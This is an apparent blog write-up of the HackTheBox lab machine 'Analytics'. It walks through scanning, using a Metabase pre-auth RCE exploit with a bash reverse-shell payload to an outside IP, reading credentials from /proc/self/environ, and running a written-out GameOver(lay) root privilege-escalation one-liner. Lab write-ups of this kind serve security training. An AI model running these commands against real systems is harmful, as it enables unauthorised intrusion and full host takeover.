HackTheBox WriteUp - Analytics
- Ts3c
- HackTheBox , WriteUp , Hacking
- January 23, 2024
This time we will have a look at the HackTheBox Machine Analytics.
First things first. We will start with a nmap scan. This scan shows two open ports, port 22 and port 80.
If we have a look at port 80 we can see the dashboard. Nothing very special on that. After clicking around for a while I found the Login button which redirects to an subdomain http://data.analytics.htb .
On this subdomain I did the normal directory scanning as usual. Found an interesting path to /api/session/properties.
With this information I started searching around on the internet for known exploits. I found this GitHub-Repo which is very new.
https://github.com/m3m0o/metabase-pre-auth-rce-poc
Next cloned this exploit and fired it up against the target with:
python main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c '/bin/bash -i >& /dev/tcp/10.10.14.82/1336 0>&1'
and started listening on port 1336 for the reverse shell:
nc -lnvp 1336
Nice! This one worked.
On this machine I looked around and searched for interesting files.
I found some sensitive data at /proc/self/environ.
Analysed the file and here we go there are some credentials. Let’s try this for SSH.
Using ssh to connect to the machine and gained the user.txt.
Privilege Escalation
Now we need to search for a Priv Esc vector. Sudo -l does not work here so I tried uname -a to check the version of the current linux system.
With the result I started looking around for known exploits in the wild. I found the GameOver(lay) Ubuntu Privilege Escalation Exploit. For this exploit I used this GitHub Repo:
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/tree/main
Using this oneliner in the SSH connection and gained root access:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
